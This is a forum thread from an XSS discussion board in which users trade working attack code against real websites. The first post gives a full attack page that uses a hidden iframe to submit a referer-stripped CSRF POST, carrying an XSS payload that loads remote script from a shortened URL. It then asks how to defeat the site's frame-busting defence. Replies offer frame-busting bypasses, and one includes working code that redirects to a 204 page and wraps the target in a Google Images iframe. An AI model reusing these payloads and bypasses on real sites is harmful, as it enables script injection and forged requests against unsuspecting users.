Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Javascript deleting other javascript?
Posted by: Neo139
Date: May 29, 2010 03:43PM

Hi. I don't know if this is the right subforum.
I have found a POST form in a website vulnerable to XSS. The idea was to have an HTML file in my host (example attacker.com/hack.html) and when the victims enters there that hack.html have an iframe that POST to the vulnerable form the script code. The problem I'm having is that I can't do it silently because the victim.com page have this javascript code in the <head>
-------------
if (top.frames.length > 0)
top.location = self.location;
if (top != self)
top.location=self.location;

document.domain = 'victim.com';
---------------
This redirects the page if the URL in the browser adressbar isn't the url of THAT page. So entering to attacker.com/hack.html will redirect you to victim.com even if the POST form code is inside an iframe.

Is there any way from hack.html to delete this code from the iframe that loads victims.com BEFORE the code gets executed by the browser? (When the redirect code is executed all other http request get aborted so my script inside one of the value of the form doesn't get executed)

The code from my hack.html would be something like this:
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex, nofollow"></head>
<body>
<iframe name="d" id="d" src="about:blank"></iframe>
<script>
var x=0;
function go(){
if(x)
return;
x++;
try
{
var strVar="";
strVar += "<!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\">";
strVar += "<html>";
strVar += "<head>";
strVar += "<body>";
strVar += "<form action=\"http:\/\/www.victim.com\/form.php\" method=\"post\" id=\"lala\" target=\"d\">";
strVar += "<input type=\"hidden\" name=\"scrapsell[72]\" value=\"\&quot;&gt;&lt;script src=http:\/\/u.nu\/47aqa&gt;&lt;\/script&gt;&lt;\">";
strVar += "<input type=\"hidden\" name=\"hash\" value=\"\">";
strVar += "<input type=\"hidden\" name=\"doscrapsell\" value=\"something\">";
strVar += "<input class=\"login_input\" type=\"submit\" value=\"\" >";
strVar += "<\/form>";
strVar += "<\/body>";
strVar += "<\/html>";
window.frames['d'].document.body.innerHTML=strVar;
window.frames['d'].document.getElementById('lala').submit();
}
catch(e){

}
}
</script>

<iframe name="c" id="c" onload="setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
</body></html>

The reason why I put manually with javascript the form inside about:blank is because that way it hides HTTP REFERER (and victims.com doesn't process the form if http referer is different to his own domain, but process it if http referer is null.

I have thought some javscript in hack.html like:
<script language="JavaScript" type="text/javascript">
function ssearch()
{
var found=0;
while (found<1)
{
setTimeout("found =
FindText(window.frames['foo'].document.body.innerHTML,'if
(top.frames.length > 0)\n top.location = self.location;\n if (top !=
self)\n top.location=self.location; \n \n document.domain =
'victim.com';')",200);
}
reeplace();
}


function reeplace()
{
window.frames['foo'].document.body.innerHTML.replace("if
(top.frames.length > 0)\n top.location = self.location;\n if (top !=
self)\n top.location=self.location; \n \n document.domain =
'victim.com"," ");
}

</script>

and then call ssearch()
But the only thing that this does is to crash my browser -_- I don't know if its even possible to replace javascript from other website just because its inside an iframe in the current webiste.
Any ideas?

Options: ReplyQuote
Re: Javascript deleting other javascript?
Date: June 01, 2010 06:22AM

I haven't tried this out, but I think it might help.

Since top.frames is under your control, deleting it would cause top.frames.length to throw an error which would prevent the frame from busting out. Otherwise google anti frame busting.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: Javascript deleting other javascript?
Posted by: p0deje
Date: June 06, 2010 12:04AM

that's a simple framebuster, which can be busted
look http://stackoverflow.com/questions/958997/frame-buster-buster-buster-code-needed

---------
http://p0deje.blogspot.com

Options: ReplyQuote
Re: Javascript deleting other javascript?
Posted by: Neo139
Date: June 27, 2010 03:25PM

I have tried that framebuster buster (server responds with 204)
it does work but the page stop loads, the XSS i was trying to inject does not load the JS.

Options: ReplyQuote
Re: Javascript deleting other javascript?
Posted by: marluxia
Date: August 18, 2010 09:47PM

Hi Neo139. This reminds me of a very similar vulnerability I used that also involved exploiting a CSRF hole. What I did was use the anti-frame busting code mentioned by p0deje. Once I had sent the POST request I created a iframe to google images, which had an iframe to the target site. I figured out that the site removed the frame busting code in the case of images.google.com.

<script>
var vulnPage = 'http://someshitsitelol.com/vuln.cgi';
var counter = 0;
window.onbeforeunload = function() { counter++; };
setInterval(function() {
if(counter == 1) {
window.top.location = 'http://website-to/204.php';
createFrame();
}
}, 80);
function createFrame() {
var iframe = document.createElement('iframe');
iframe.src = 'http://images.google.com.au/imgres?imgurl=x&imgrefurl=' +
vulnPage;

document.body.appendChild(iframe);
}
</script>

The code above no longer works as it seems like google images requires some more parameters for you to be able to link to another page.

I also found this: https://docs.google.com/fileview?id=0B9MkvtnWPqvEZmEyODdjZTYtYTI0ZS00MDU1LTg2OGEtNzhkNTk2YmJiNzlh&hl=en pdf which may be of use to you.

Sorry if I bumped an old thread lol : - (.



Edited 1 time(s). Last edit at 08/18/2010 09:49PM by marluxia.

Options: ReplyQuote


Sorry, only registered users may post in this forum.